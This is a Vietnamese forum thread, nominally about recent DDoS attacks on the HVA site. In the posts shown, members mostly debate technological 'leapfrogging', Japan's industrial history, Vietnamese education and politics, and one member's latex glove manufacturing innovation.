Bạn viết "Đi tắt đón đầu, đón bắt công nghệ" (câu này bạn viết ẩu, không hết ý, phải viết rõ là công nghệ gì chứ?) hoàn toàn không phải là chuyện sai. Nước Nhật cũng đã làm như vậy sau chiến tranh thế giới thứ hai, nên họ mới đuổi kịp Mỹ. Về công nghệ, theo tôi, hiện nay họ vẫn đứng ở mức tiên tiến, chỉ kém Mỹ ở một vài lĩnh vưc.

Thế anh PXMMRF nghĩ trước thế chiến thứ 2 Nhật nó thua công nghệ Mỹ xa lắm sao??? Em nghĩ anh nên xem lại vấn đề này kỹ hơn. Mặc dù không thích Nhật lắm nhưng phải thừa nhận rằng Nhật là một nước có nội lực từ rất lâu rồi. Ngay trong thế chiến thứ 2, vũ khí của nó cũng đã có máy bay, súng ống, đồ điện tử... rồi. Nó mà yếu thì làm sao mà gây chiến với phe đồng minh. Chỉ vì 2 trái bom nguyên tử mà phải mang tiếng kẻ chiến bại chứ Nhật là một nước mạnh về công nghệ đã từ rất lâu. Tất cả những gì Nhật có được ngày hôm nay chẳng qua là hiển nhiên nó phải vậy cho dù có sự giúp đỡ của Mỹ hay là không đi nữa. Hãy xem Nhật đã đem lại những gì cho giới công nghệ dân dụng: Play Station, Karaoke, Máy nghe nhạc Walkman,... và nhiều thứ đồ khác nữa. Hay những cụm từ nổi tiếng như Thần Phong Kamikaze, Sóng Thần Tsunami, Hiệp sĩ đạo Samurai... đều có từ Nhật mà ra. Cho thấy là không hề có cái đi tắt đón đầu nào ở nước Nhật cả, tất cả đều là quá trình học hỏi, nghiên cứu lâu dài mà ra. Nói như anh PXMMRF là đã quá coi nhẹ nội lực của chính nước Nhật. Là một người làm công nghệ điện tử và máy tính, tôi , theo ý kiến cá nhân, khẳng định không bao giờ có cái việc đi tắt đón đầu khỉ gió nào cả. Không có con đường tắt cho sự thành công. Cho dù là có chuyển giao công nghệ đi chăng nữa, thì ngươi kỹ sư vẫn phải đi từ những thứ căn bản mà lên để có thể hiểu rõ công nghệ để mà nếu "may mắn" thì có thể làm nó tốt hơn hoặc "phát minh" ra một cái tốt hơn nhiều lần. Công nghệ có thể lỗi thời nhưng nếu không hiểu cái lỗi thời của nó thì làm sao hiểu được cái hay cái tốt của cái tân tiến. Đã không hiểu thì làm sao mà còn "sáng tạo" được cái gì hay hơn??? Ví như trong HVA, có rất nhiều người sử dụng tốt, nắm bắt tốt công nghệ Computer Networking. Nhưng có mấy ai viết được bài publications đăng trên tạp chí khoa học? Có được bài articles nào trên tạp chí khoa học? Bởi vì "đi tắt đón đầu" chờ nghiên cứu của người khác thì dễ, ngồi tự mày mò theo đuổi nghiên cứu riêng thì mấy ai làm được. Đừng đi tắt, đừng đón đầu, bước những bước thật chậm mà chắc chắn. Một lần nữa, không có con đường tắt cho sự thành công Dù cách viết của kutruoi có hơi lung tung, lan man nhưng về ý chính tôi vẫn đồng ý với quan điểm của bài post #932. Còn ai cảm thấy không chấp nhận được thì hãy đọc bài này http://www.gocnhinalan.com/Details.aspx?id=97 rồi suy nghĩ. Hãy đọc và suy nghĩ.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Có vài chuyện cần nói cho rốt ráo ở đây. Thứ nhất, chuyện "đi tắt đón đầu" trong công nghệ và chuyện "chuyển giao công nghệ". Nếu ai làm việc hoặc có cơ hội tiếp cận ở tầm vĩ mô và hoàn toàn trung thực, hoàn toàn tỉnh táo thì sẽ hiểu rằng "đi tắt đón đầu" và "chuyển giao công nghệ" chỉ là mấy cụm từ hoa mỹ để làm đỏm chớ thực chất chẳng có gì hết. Kiến thức, kinh nghiệm và việc áp dụng chúng để kiến tạo những sản phẩm, những giải pháp hữu ích cho đời sống và cho xã hội cần có sự trải nghiệm, sự vấp ngã và điều chỉnh. Không thể có chuyện "đi tắt" được. Ngay cả việc thừa hưởng trọn vẹn những nghiên cứu nào đó, người thừa hưởng vẫn cần thời gian và trải nghiệm để nắm bắt cái mình đã được thừa hưởng. Đó là chưa nói đến chuyện "đi tắt" có nghĩa là đốt cháy giai đoạn (nhằm đi đến kết quả nhanh hơn) thường dẫn đến những đổ vỡ nghiêm trọng. Cũng vì "đi tắt, đón đầu" mà gần đây TQ thiết lập vượt kế hoạch dạng tàu siêu tốc và dẫn đến chuyện lật tàu, chết hàng ngàn người nhưng TQ hoàn toàn ém nhẹm thông tin này. Đây chỉ là một đơn cử trong hàng triệu đơn cử. Trong công nghệ thông tin, tính thừa hưởng và xây dựng trên nền có sẵn thì có nhưng tính "đi tắt đón đầu" thì hoàn toàn không thể và không nên. Cho đến nay đã có hàng ngàn, thậm chí hàng chục ngàn sinh viên hoặc những người "mê" CNTT một cách cảm tính, muốn thấy kết quả nhanh và đã "đi tắt đón đầu" để rồi đi đến chỗ bế tắc và chán nản. Hãy bình tĩnh và trung thực mà nhìn nhận là nền CNTT của Việt Nam mình hoàn toàn tự phát, hoàn toàn mang tính đối phó và hoàn toàn chạy sau những gì thiên hạ tung ra. Ngay cả ở vị trí "gia công", Việt Nam mình vẫn chạy theo Ấn Độ hàng mấy chục năm. Riêng các ngành công nghệ khác, Việt Nam mình hoàn toàn sử dụng công nghệ của nước ngoài. Về mặt "chuyển giao công nghệ", đây là kiểu chơi lù mù ngôn từ. Đám kinh doanh và thương mại nước ngoài họ chỉ có một mục tiêu duy nhất: bán sản phẩm. Họ cần bán càng nhiều càng tốt để kiếm lợi càng nhiều càng tốt. "Chuyển giao" ở đây là "chuyển giao" sản phẩm chớ chẳng phải "chuyển giao" công nghệ. Đây là một cách gọi màu mè và thiếu trung thực. Nó có thể làm mát dạ những ông xếp đặt bút ký hợp đồng bởi vì các ông ấy nghĩ rằng đám kinh doanh "bán" luôn cả cái công nghệ của họ. Thực chất, họ chỉ bán hàng và cùng lắm là cung cấp đủ kiến thức để end-users (kể cả system admin) sử dụng. Chưa có một thứ "công nghệ" nào Việt Nam mua từ nước ngoài để tự do sản xuất và gắn cái nhãn "Made in Vietnam" hết (ngoài một số thứ gia công đơn giản như quần áo, giày dép, thức ăn...v...v...). Thứ nhì, chuyện Nhật lạc hậu trước chiến tranh thế giới thứ II là chuyện nhiều người ngộ nhận. Từ cuối thế kỷ 19 và ngay cả trước đó, Nhật đã có nhiều phát minh khoa học, đặt biệt là về hoá học và vật lý. Nhật không hề "đi tắt đón đầu" mà họ chịu khó học hỏi các nước đã phát triển để lấy nguồn chất xám về để phục hồi lại đất nước của họ. Nhật không có chủ trương thành tích và họ không dạy con nít của họ thói mê thành tích. Người Nhật có tính kỷ luật cao, biết tự giác và tự trọng. Trước đệ nhị thế chiến, đế quốc Nhật đã thừa sức mạnh để đánh chiếm và khống chế cả Sakhalin của Nga, Đài Loan, Đại Hàn và sau đó gần như trọn bộ TQ (để cho đến ngày nay, người TQ vẫn cho rằng thời gian Nhật chiếm TQ là thời gian "đen tối và nhục nhã"). Trước đệ nhị thế chiến, Nhật đã thừa sức chế tạo phi cơ và họ đã có lực lượng quân sự hùng hậu. Những "Kawanishi", "Aichi", "Nakajima"...v...v... đã có từ hồi thập niên 30' của thế kỷ 20 và những thứ ấy không phải là kết quả của "đi tắt đón đầu" mà là một quá trình phát triển công nghệ vững chắc và lâu dài. Thứ ba, một số bạn lôi đảng Việt Tân, đảng Cộng Sản, chế độ VNCH và lôi cả chuyện "chống cộng sản" ra e đã đi quá xa. Việc lôi kéo các "thế lực" chính trị vô đây chỉ nhằm phục vụ mục đích đổ lỗi và bào chữa cho những hành động hư hoại và bẩn thỉu xảy ra trong một thời gian rất dài. Vấn đề ở đây không chỉ nằm ở chỗ "ddos xong rồi thôi" mà còn đi xa đến chỗ sử dụng những biện pháp hoàn toàn phi pháp như trojan, đánh cắp password, đánh cắp thông tin cá nhân, bêu rếu bôi nhọ danh dự người khác, sử dụng tài nguyên của người khác một cách phi pháp ..v...v... ai đã làm những việc này và ai sẽ chịu trách nhiệm những việc này? Xin nhớ cho rằng, bất cứ một quốc gia nào cũng có luật pháp và quy định chớ chẳng phải mà những đám underground hoạt động kiểu mafia. Nếu các thế lực chính trị muốn chơi nhau thì hãy chơi nhau nhưng đừng chơi những chỗ và những cá nhân phi chính trị. Tại sao dantruongx đập "chodientu" thì bị tóm gáy nhưng stl đập vietnamnet thì im lìm? Nếu stl là một đám "mượn khựa để làm đối trọng" và đánh phá, gây bất ổn thì tại sao các cơ quan chức năng lại im lặng? Xin chia sẻ với các bạn là sau một thời gian điều tra cái trò "stl" này, tôi càng lúc càng thấy chán ngán. Chán ngán với những trò thủ đoạn, dối trá, lừa lọc. Chán ngán với những trò che chắn, nhân danh, chụp mũ và đe doạ. Chán ngán với quá nhiều thứ bẩn thỉu và bỉ ổi. Có lẽ tôi ngây thơ quá, cứ nghĩ rằng sự thật và trung thực vẫn được trân quý và gìn giữ nhưng thực sự không phải vậy. Có những thứ quan trọng hơn sự thật, công bằng và trung thực. @ thuypv: nếu blog đó nhảm nhí và vô giá trị thì mặc kệ nó. Nếu nó vô giá trị thì nó sẽ bị bỏ hoang như hàng triệu blog khác. Việc gì phải tốn thời gian và tiền của để dập nó? Ai lại phí thời gian và tiền của để đánh phá mấy cái blogs vô giá trị? Bồ theo dõi thường xuyên chủ đề này thế nào mà đi đến kết luận rằng stl là thế lực chống đối đảng CS vậy? Bồ giải thích cái logic "chống đối đảng CS" bằng cách dập các trang lề trái, dập luôn HVA, dập cả vietnamnet và tất cả các cơ quan chức năng đều im lìm xem?

Phân tích tính chất vài trận DDoS HVA vừa qua.

maclaren — GMT

Theo tôi thấy ! hiên tại có những người trên diễn đàn này nghiên cứu về STL, tìm hiểu về họ. Nhưng để làm gì ?. nên quay lại mục đích ban đầu "tìm hiểu nguyên nhân, cách thức để đối phó" thì tốt hơn ngồi tốn công gõ bàn phím để kéo chủ đề lệch lạc từ chủ đề kỹ thuật --> chủ đề tán gẫu để bình luận sang chính trị. - CHÚNG TA LÀ DIỄN ĐÀN PHI CHÍNH TRỊ NÊN KHÔNG NÊN NGỒI ĐÓ GÁN GHÉP HAY CHO STL LÀ 1 NHÓM LÀM VIỆC THEO CHÍNH TRỊ NHẰM PHÁ HOẠI, HAY ĐÁNH LỪA DƯ LUẬN. VÌ ĐỐI VỚI CHÚNG TA HỌ VẪN LÀ ẨN SỐ. TỐT NHẤT NÊN QUAY LẠI VẤN ĐỀ KỸ THUẬT HOẶC CLOSE TOPIC ĐI. TRÁNH BÌNH LUẬN LUNG TUNG. GÂY MẤT ĐOÀN KẾT NỘI BỘ.

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

Tôi đọc khá kỹ bài viết của bạn rongchaua. Tính tôi là như vậy. Đoc kỹ để hiểu ý họ viết và ẩn ý nếu có sau câu viết. Tôi không chỉ đọc phớt qua rồi đã có ý kiến tán đồng hay phản bác. Nếu thuận lơi tôi cũng sẽ tìm hiểu người viết là ai, họ đang làm công việc gì, họ có am hiểu về chủ đề đang bàn hay không? Vì có thể họ chưa viết hết ý họ nghĩ, vì một vài lý do nào đó... vân vân. Quay trở lai vấn đề "đi tắt đón đầu , nắm bắt công nghệ cao" Trước hết "Đi tắt đón đầu" theo nghĩa đen của nó là một hành động tìm con đường tắt, ngắn hơn, để đi, nhằm đuổi kip người đã đi trước mình. Đó là điều trong thưc tế dân gian thường làm, nên nó không có gì là sai cả, hay là khác. Sau nữa, tôi không hề nói "đi tắt đón đầu nắm bắt công nghệ cao" theo kiểu VN, hay như một số nhà máy, cơ quan Việt nam đã làm vừa qua. Tôi không hề đề cập đến ý này. Nhưng dường như bạn đã bình luận theo ý đó. Có lẽ tôi là một trong số không nhiều người hiểu rõ về những nguy hiểm, ngớ ngẩn và tổn thất nặng nề về việc đi tắt đón đầu nắm bắt công nghệ cao của Việt nam, nói chính xác hơn là của khá nhiều nhà máy, cơ quan Việt nam, đăc biệt là các công ty, tập đoàn do nhà nước quản lý (chủ sở hữu là nhà nước). Có nhiều nguyên nhân, trong đó có nguyên nhân là họ có sẵn tiền, đươc ưu tiên cấp tín dụng hoặc vay với lãi suất quá ưu đãi, như là tiền chùa vậy. Tại sao tôi lại biết rõ như vậy, lý do đơn giản là cách đây khoảng 2-3 năm tôi phải hoàn tất một luận án Thac sĩ QTKD (lớp học do các giáo sư Mỹ, châu Âu dạy) dày khoảng 100 trang. Đề tài của luận án là nghiên cứu những tồn tại, bất cập trong hoạt đông KT của các công ty, tập đoàn vốn sở hữu nhà nước dẫn đến hiệu quả thấp, nhiều nguy cơ phá sản. Tồn tai của các tập đoàn, công ty nhà nước thì nhiều, trong đó dĩ nhiên có cả hiện tượng "đi tắt đón đầu. đón bắt công nghệ cao" một cách chủ quan, không khoa học và thiếu tính toán, gây lãng phí nghiêm trong. Tôi phân tích khá kỹ vấn đề này với các thí dụ cụ thể (khoảng 3-4 trang gì đó) Tôi nhớ lúc đó tôi khẳng định là Vinashin phải bị coi là phá sản, vì nợ vay của họ đã gần gấp 10 lần vốn sở hữu (trong khi nơ gấp 2 lần vốn là công ty đã phải đặt vào tình thế báo động) và họ không có khả năng trả nơ khi đáo hạn nơ. Thôi hơi lan man, quay lai vấn đề. Thưc ra cũng có một số ít XN, công ty VN (thường chỉ là các công ty tư nhân hay công ty cổ phần vốn tư nhân chiếm ưu thế) vẫn có cách đi tắt đón đầu nắm công nghệ cao một cách khôn ngoan, hơp lý và có hiệu quả thưc tế (Xin nhớ là tôi đang viết dòng chữ "đi tắt đón đầu nắm bắt công nghệ cao" với nghĩa như tôi đã viết ở đầu bài viết này. Đừng mang cách hiểu của người khác ghép vào đây) Lấy thí dụ ngay tai công ty sản xuất của chính tôi cho thưc tế và dễ hiểu. Công ty tôi sản xuất găng mổ từ cao su thiên nhiên. Công nghệ pha chế latex cao su thiên nhiên với các hoá chất (Vulcanizing agent, Accelerator, Activator...) là bước công nghệ quan trọng quyết định năng suất và chất lượng sản phẩm để có thể canh tranh trên thị trường quốc tế. Tôi đươc đi thưc tập sản xuất tai Ấn độ trong 6 tháng và tôi chủ động đi tham quan sản xuất tai nhiều công ty Malaysia, Thailand, dù để đươc tham quan không dễ chút nào. Ở các công ty Ấn độ và Malaysia, Thailand việc pha chế- lưu hoá latex đươc thưc hiện trên một hệ thống lớn gồm nhiều thùng khuấy có 2 lớp vỏ, dùng gia nhiệt. Các cánh khuấy đươc truyền động lắc qua lắc lại từ một hệ thống truyền đông trung tâm. Tôi mất nhiều thời gian nghiên cứu rất kỹ thưc tế sản xuất ở các nước nói trên, cũng như đoc vô vàn tài liệu KT liên quan đến công nghệ này. Tôi nhận ra một điều là nếu đi theo con đường công nghệ của họ thì không thể nào cạnh tranh với họ được. Vì họ đã có nhiều kinh nghiệm trong việc thưc hành công nghệ (này), họ có một nguồn vốn đầu tư lớn và sản phẩm của họ đã chiếm lĩnh thị trường TG nhiều năm nay, kể cả thị trường VN. Từ đó tôi quyết định nghiên cứu một công nghệ -thiết bị mới, khác hoàn toàn với công nghệ và thiết bị của các nước nói trên. Hệ thống thiết bị pha chế lưu hoá latex do tôi thiết kế là hệ thống lưu hoá-khuấy trộn tuần hoàn phòng đốt ngoài dưới chân không, hoat đông theo một nguyên lý khá hiện đại. Thiết bị gọn nhẹ chỉ chiếm diện diện tích bằng 1/5 đến 1/10 diện tích chiếm chỗ của hệ thống cũ và có hiệu quả kinh tế, kỹ thuật cao. Chất lượng sản phẩm tăng lên rõ rêt. Găng của công ty tôi nay chiếm 50-60% thị phần VN và đánh bật găng nhập khẩu từ nước ngoài, vì chúng tốt hơn và rẻ hơn. Ngoài ra tôi cũng áp dung công nghệ Nano (sử dụng các vật liêu cỡ hat Nano - 1 nano= 1 phần tỷ mét, 1 phần ngàn micron) vào công nghệ sản xuất găng mổ. Do vậy găng của công ty tôi có hình thức khá đẹp (óng ánh, trong trẻo) và có độ bền cơ học cao. Bài hoc thành công của công ty tôi là nghiên cứu kỹ, rất kỹ công nghệ của các nước khác và từ đó tìm ra một công nghệ mới, nắm bắt đươc chiều hướng phát triển của công nghệ cao, không đi theo, bắt chước rồi cố hoàn thiện công nghệ của các nước khác. (Với công trình này và các công trình khác nữa tôi đã nhận giải nhất Khoa hoc-công nghệ VN năm 2006 và có thể năm nay tôi sẽ nhân Giải thưởng NHà nước về KH-CN- Không hiểu có đươc không?) Qua thí dụ trên ta thấy khi nói "đi tắt đón đầu , nắm bắt công nghệ cao" là cần nói rõ thêm là làm theo cách nào, theo kiểu nước nào?. Nếu nói là làm theo kiểu VN, thì cũng nói rõ là theo kiểu công ty nào, đơn vị nào? Nhật bản sau chiến tranh (repeat after second world war) cũng có những trường hơp và thí dụ như trường hơp công ty tôi. Có điều là nó nhiều hơn, rộng khắp trong nền công nghiệp và chắc là khoa học và thông minh hơn. Nếu cần tôi sẽ cho thí dụ về trường hơp xe gắn máy 4 thì và...........các lò phản ứng nguyên tử. Cái gì tôi cũng muốn viết thật thưc tế, để các bạn đọc đỡ chán.

Phân tích tính chất vài trận DDoS HVA vừa qua.

Nowhereman — GMT

@kutruoi : mình nghĩ bạn viết rất ẩu câu : "tìm hài cốt liệt sỹ " lợn" ( vì toàn tìm ra xương động vật thôi mà ". và anh PMMXF đã lên án và mắng bạn là đúng đấy bạn nên chỉnh sửa cho rõ nghĩa là " họ đi tìm hài cốt liệt sỹ, nhưng thay vì tìm được xương các anh ( hoặc các đồng chí ấy) thì bọn buôn thần bán thánh đó chỉ tìm được toàn xương "lợn, hoặc xương động vật khác, và mù màu đi thành xương người ". > nhưng mình cũng đã đọc được lời hiệu chỉnh và xin lỗi của bạn ở phần dưới. > về những ý bạn khái quát ở nước mình như thế theo mình là rất chuẩn và thực tế. @rongchaua : quả thật em cũng có chung quan điểm với anh ở chỗ "publications". theo như em biết có một số tạp chí khoa học khá nổi tiếng như : elsevier, sciencedirect, nature ( << tờ này là Chalers Darwin đăng "the origin of species " ) . v.v Họ sẵn sàng mua những nghiên cứu và những articles có giá trị về các lĩnh vực khoa học tự nhiên và xã hội. Giờ chúng ta hãy thử nhìn lại một cách thật thoáng và thẳng thắn về hệ thống giáo dục của Việtnam xem sao ? Nếu chỉ nhìn vào chương trình lớp 12, thì chắc hẳn cũng không mấy vấn đề. Nhưng thực sự đến level đại học, master. doctor and postdoctor . thì ..quả thật thấy giá trị về mặt học thuật lại loanh quanh và đi vào những bài tốt nghiệp " xuất sắc" , những "đề tài " KHoa HỌc" xuất chúng ...trời ơi. nhưng ông tiến sỹ với này kia nọ khác, mà thật sự sự thật của trí thức nhân loại không ai biết tới những " công trình khoa học " kiệt xuất được sào nấu thêm bớt, tự tung hô tự vinh danh tự cho điểm và tự khoác lên mình những cái mác khiến người đời " run sợ " .!!!!! ( không phải hết cả . vẫ có những nhà tri thức và học giả thực sự < em không nói tới, vì thường là tư tưởng và môi trường đào tạo nên họ ở những nước tiến bộ ) @conmale : em đồng ý với anh về sự bền bỉ và phải dám nhìn nhận sự thật. em thấy được sự chân thành trong những ý anh viết. trước đây em cũng là một người rất thiếu kiên nhẫn, thường xuyên " đốt cháy giai đoạn" và sự trả giá là sau bao năm tháng . thấy mình " không chắc chắn một thứ gì cả ". nhưng cung may mắn là em đã dám nhìn nhận và đi lại, học lại, hỏi lại, tự tìm hiểu lại ..mọi điều một cách từ từ và vững vàng . @all : đây là một diễn đàn phi lợi nhuận. mọi người nên chân trọng những gì mà các anh quản trị, các anh em thành viên và mọi người đã chia sẻ cho chúng ta. nếu bạn vẫn chưa hiểu ý mình nói thì các bạn thử đặt địa vị của các bạn vào địa vị của các anh ấy xem thì sẽ hiểu. Họ cũng có gia đình và cuộc sống riêng tư đầy bận rộn cần phải quan tâm tới; ấy vậy mà họ vẫn dành thời gian quý báu đó vào đây làm : > giải thích, hướng dẫn, chỉ dạy IT > chia sẻ, tâm sự, khuyên bảo . > dành thời gian cho những điều mà một xã hội văn minh không thể thiếu những con người như họ. một vài ý kiến . xin cảm ơn mọi người.

Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo — GMT

Một số bạn nhận định là An Ninh Mạng Việt Nam không can dự vào mấy kiểu hack, dùng trojan lấy username và password...thì có vẻ không đúng, vì ông Vũ Hải Triều (trung tướng C.A) đã có lần khoe là An Ninh Mạng Việt Nam xoá sổ gần 300 blogs, websites "nội dung xấu". Còn về mặt kỹ thuật làm thế nào thì chắc các bạn hiểu rõ khi đọc thread này. Anh TQN trong thời gian đầu đương đầu với STL thấy rất nhiều tên tiếng Tàu khi truy xét tới các thông tin liên quan. Do vậy đủ kết luận là có người TQ trong STL team. Thông tin cuối em bàn tới chính trị tí: Ở VN bây giờ các bô lão chẳng đoàn kết đâu, mạnh thằng nào thằng ấy chiến thôi. Dựa hơi được anh nào càng mạnh để củng cố cái ghế của mình thì càng tốt. Kèm theo đấy là các âm mưu mà có lẽ chỉ có mấy trăm năm sau con cháu mới soi sáng được. Còn việc đi tắt đón đầu cái gì chứ đi tắt đón đầu về TƯ TƯỞNG là không thể, một đất nước thoát khỏi phong kiến thì chỉ còn cách đi qua TBCN, rồi tới cái gì sau đấy thì chưa biết. Nhân loại đã thế rồi, VN cũng chẳng có con đường nào khác, thực tế có lẽ VN đang ở giai đoạn CNTB man rợ (theo đúng từ được học trong sách lịch sử :)), và chúng ta có thành phần TƯ BẢN ĐỎ.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TMDTHBC — GMT

@nowhereman: thanks các góp ý của bạn về mình. Xin đính chính mình không là học viên của học viện kỹ thuật quân sự - già rồi-. Mình tham gia topic này với tinh thần học hỏi là chính, nói rõ hơn dựa vào phân tích của các thành viên và với một ít kiến thức về lập trình mình muốn xây dựng tool để hỗ trợ phân tích sóng gây nhiễu radar phục vụ tốt hơn cho công việc, đơn giản thế thôi. Các bài phân tích của các anh PXMMRF, conmale, TQN, bolzano ... và rất nhiều thành viên khác đã giúp mình có ý tưởng về xây dựng hệ thống phân tích dựa vào quá trình "đi ngược"... Chân thành cảm ơn HVA đã tạo ý tưởng cho mình. @nowhereman: trân trọng các góp ý của bạn, thanks, "bạn điều chỉnh chính tả Tiếng Việt của mình tí nhé". Mình không cố ý bắt bẻ mà chỉ góp ý, có đôi lúc typewritting nhanh quá sẽ ... hihi

Phân tích tính chất vài trận DDoS HVA vừa qua.

Nowhereman — GMT

texudo wrote:

Một số bạn nhận định là An Ninh Mạng Việt Nam không can dự vào mấy kiểu hack, dùng trojan lấy username và password...thì có vẻ không đúng, vì ông Vũ Hải Triều (trung tướng C.A) đã có lần khoe là An Ninh Mạng Việt Nam xoá sổ gần 300 blogs, websites "nội dung xấu". Còn về mặt kỹ thuật làm thế nào thì chắc các bạn hiểu rõ khi đọc thread này. Anh TQN trong thời gian đầu đương đầu với STL thấy rất nhiều tên tiếng Tàu khi truy xét tới các thông tin liên quan. Do vậy đủ kết luận là có người TQ trong STL team. Thông tin cuối em bàn tới chính trị tí: Ở VN bây giờ các bô lão chẳng đoàn kết đâu, mạnh thằng nào thằng ấy chiến thôi. Dựa hơi được anh nào càng mạnh để củng cố cái ghế của mình thì càng tốt. Kèm theo đấy là các âm mưu mà có lẽ chỉ có mấy trăm năm sau con cháu mới soi sáng được. Còn việc đi tắt đón đầu cái gì chứ đi tắt đón đầu về TƯ TƯỞNG là không thể, một đất nước thoát khỏi phong kiến thì chỉ còn cách đi qua TBCN, rồi tới cái gì sau đấy thì chưa biết. Nhân loại đã thế rồi, VN cũng chẳng có con đường nào khác, thực tế có lẽ VN đang ở giai đoạn CNTB man rợ (theo đúng từ được học trong sách lịch sử :)), và chúng ta có thành phần TƯ BẢN ĐỎ.

@texudo : a) vấn đề bạn đưa lời ông " Vũ Hải Triều " khoe xoá sổ gần 300blogs có nội dung xấu. mình xác định thông tin bạn đưa là thực. b) việc bạn nói anh TQN đối đầu với bọn STL và thấy nhiều " tên tiếng Tầu , khi truy xét các thông tin liên quan ". theo mình là : CHƯA THỂ NÀO đủ để kết luận có người trung quốc tham gia vì : > ví dụ giờ mình có thể code hoặc mark vào những thông tin có liên quan đến vấn đề mình đang làm hoàn toàn bằng tiếng Lào ? các anh khác họ có thể làm hoàn toàn bằng tiếng anh ? hoặc tiếng trung tiếng nhật ? kể cả làm việc trong team work, và đặc biệt làm việc phá hoại người khác thì họ nghĩ ra mọi thủ đoạn để đánh lạc hướng suy luận của mọi người chứ . ?? c) vấn đề chính trị bạn nêu lên mình thấy cũng đúng. @TMDTH : tại hạ không biết nên đã thất lễ với tiền bối. mong rằng tiền bối lượng thứ nếu tại hạ có viết ý gì gây khó chịu. tại hạ xin trân trọng những ý kiến góp ý của tiền bối ạ. tại hạ xin cố gắng sửa, và điều chỉnh chính tả để tiếng việt mình thêm đẹp hơn và đúng nữa . > tiền bối đang nghiên cứu để lập trình một " tool hỗ trợ phân tích sóng gây nhiễu radar ? vậy tiền bối có thể cho tại hạ biết " quá trình đi ngược " của tiền bối về các loại sóng gây nhiễu ? các loại sóng ảnh hướng tối sóng rada ? và nguồn nó ở đâu chưa? . rùi biết đâu anh em HVA lại giúp anh lập trình ok mà . chúc anh thành công . :D @PXMMRF : nếu quả thật là anh và công ty của anh đã cải tiến quy trình công nghệ của họ ( Malaysia, Thailand ) trong quá trình sản xuất và đạt được những thành công và tiết kiệm; thì đây là một sáng chế mà. và điều này không phải là " đi tắt đón đầu " mà đây là phát triển, cải tạo thêm, sáng chế thêm và ứng dụng linh hoạt hơn các techno của họ.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

PXMMRF wrote:

Lấy thí dụ ngay tai công ty sản xuất của chính tôi cho thưc tế và dễ hiểu. Công ty tôi sản xuất găng mổ từ cao su thiên nhiên. Công nghệ pha chế latex cao su thiên nhiên với các hoá chất (Vulcanizing agent, Accelerator, Activator...) là bước công nghệ quan trọng quyết định năng suất và chất lượng sản phẩm để có thể canh tranh trên thị trường quốc tế. Tôi đươc đi thưc tập sản xuất tai Ấn độ trong 6 tháng và tôi chủ động đi tham quan sản xuất tai nhiều công ty Malaysia, Thailand, dù để đươc tham quan không dễ chút nào. Ở các công ty Ấn độ và Malaysia, Thailand việc pha chế- lưu hoá latex đươc thưc hiện trên một hệ thống lớn gồm nhiều thùng khuấy có 2 lớp vỏ, dùng gia nhiệt. Các cánh khuấy đươc truyền động lắc qua lắc lại từ một hệ thống truyền đông trung tâm. Tôi mất nhiều thời gian nghiên cứu rất kỹ thưc tế sản xuất ở các nước nói trên, cũng như đoc vô vàn tài liệu KT liên quan đến công nghệ này. Tôi nhận ra một điều là nếu đi theo con đường công nghệ của họ thì không thể nào cạnh tranh với họ được. Vì họ đã có nhiều kinh nghiệm trong việc thưc hành công nghệ (này), họ có một nguồn vốn đầu tư lớn và sản phẩm của họ đã chiếm lĩnh thị trường TG nhiều năm nay, kể cả thị trường VN. Từ đó tôi quyết định nghiên cứu một công nghệ -thiết bị mới, khác hoàn toàn với công nghệ và thiết bị của các nước nói trên. Hệ thống thiết bị pha chế lưu hoá latex do tôi thiết kế là hệ thống lưu hoá-khuấy trộn tuần hoàn phòng đốt ngoài dưới chân không, hoat đông theo một nguyên lý khá hiện đại. Thiết bị gọn nhẹ chỉ chiếm diện diện tích bằng 1/5 đến 1/10 diện tích chiếm chỗ của hệ thống cũ và có hiệu quả kinh tế, kỹ thuật cao. Chất lượng sản phẩm tăng lên rõ rêt. Găng của công ty tôi nay chiếm 50-60% thị phần VN và đánh bật găng nhập khẩu từ nước ngoài, vì chúng tốt hơn và rẻ hơn. Ngoài ra tôi cũng áp dung công nghệ Nano (sử dụng các vật liêu cỡ hat Nano - 1 nano= 1 phần tỷ mét, 1 phần ngàn micron) vào công nghệ sản xuất găng mổ. Do vậy găng của công ty tôi có hình thức khá đẹp (óng ánh, trong trẻo) và có độ bền cơ học cao. Bài hoc thành công của công ty tôi là nghiên cứu kỹ, rất kỹ công nghệ của các nước khác và từ đó tìm ra một công nghệ mới, nắm bắt đươc chiều hướng phát triển của công nghệ cao, không đi theo, bắt chước rồi cố hoàn thiện công nghệ của các nước khác. ......

Có thể lạc đề một chút nhưng điểm anh PXM đưa ra lý thú quá nên em xin phép... lạc đề một tí :P . Em thấy ví dụ anh PXM đưa ra rất lý thú và rất đáng chiêm ngưỡng. Tuy nhiên, theo em thấy, tinh thần anh nêu ra ở đây thuộc phạm trù quan sát và cải tiến (innovating) chớ không hẳn là "đi tắt đón đầu" (skipping processes). Thật ra anh không hề "đi tắt" mà anh đã tốn rất nhiều thời gian và công sức để nghiên cứu những gì đã có của nước ngoài, sau đó mới hình thành giải pháp đặt thù và hữu hiệu nhất cho mình. Hơn nữa, kiến thức về hoá chất của anh chắc chắn phải có sẵn và đã hình thành từ trước, sau đó, từ quan sát và đúc kết những gì đã được hình thành trong công nghệ, anh mới tạo ra một lối phát triển và ứng dụng mới. Anh không thể đốt giai đoạn kiến thức và đốt giai đoạn quan sát thực tế được. Ngay cả việc hình thành một mô hình lưu hoá kia, anh vẫn phải đi xuyên qua giai đoạn thử nghiệm và điều chỉnh chớ không thể "đi tắt" bằng cách hình thành ngay hệ thống hoàn chỉnh được. Vấn đề cần bàn ở đây là tư duy "đi tắt đón đầu" bị ngộ nhận một cách tội nghiệp khiến cho không ít người bị lỗ hổng khủng khiếp trong quá trình đào luyện chuyên môn. Cái này thể hiện rất rộng với thái độ 'mì ăn liền' trong hầu hết khía cạnh trong đời sống và đây là điều cực kỳ tai hại. @ all, một điều tớ nhận thấy càng lúc càng rõ rằng có một khúc mắc khá lớn trong việc thảo luận và phê bình. Có rất nhiều bạn rất dễ phản ứng trước phê bình và luôn luôn cho rằng "phê bình" là "bôi xấu và chỉ trích". Nên phân biệt một cách rõ ràng là - "Phê bình" là phân tích và đánh giá sự thể để rồi đi đến hướng khắc phục. - "Bôi xấu và chỉ trích" là phân tích và đánh giá sự thể nhưng không đi đến hướng khắc phục mà 